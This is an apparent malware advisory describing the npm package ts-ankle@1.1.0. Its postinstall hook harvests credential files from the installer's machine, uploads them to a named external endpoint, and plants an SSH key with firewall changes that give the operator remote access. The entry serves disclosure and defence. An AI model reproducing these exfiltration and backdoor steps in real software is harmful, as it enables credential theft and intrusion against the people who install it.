MAL-2026-6548

--- _-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (1695e2ffa9252abe1053fc13895a071bd87cb27eb009eeb2262aae1a27da4ea5) On `npm install`, ts-ankle@1.1.0 runs a `postinstall` hook (`node test.js`) that executes two hostile flows against the installer's machine without user interaction. (1) Credential harvest: the script recursively walks the user's home directory on Unix and every mounted drive on Windows, collects files matching credential patterns (`.env`, `.json`, `.toml`, `.pem`, `id.json`, etc.), and POSTs them as multipart form uploads to `https://datasecure-service.vercel.app/api/v1`. The scan and block patterns are fetched at install time from `/api/scan-patterns` and `/api/block-patterns` on the same host, letting the operator dynamically retarget which files are exfiltrated. (2) SSH backdoor: the script fetches an SSH public key from `/api/ssh-key` and, on Linux, appends it to `~/.ssh/authorized_keys`, chowns the directory via `sudo`, and runs `sudo ufw enable` + `sudo ufw allow 22/tcp` to ensure inbound SSH is reachable — granting the operator persistent remote access to the installer's host. The package's self-description as a backup/data-upload utility does not change the behavior: bulk credential-file harvest plus authorized_keys injection directed at a hardcoded author endpoint is supply-chain credential theft and remote backdoor installation.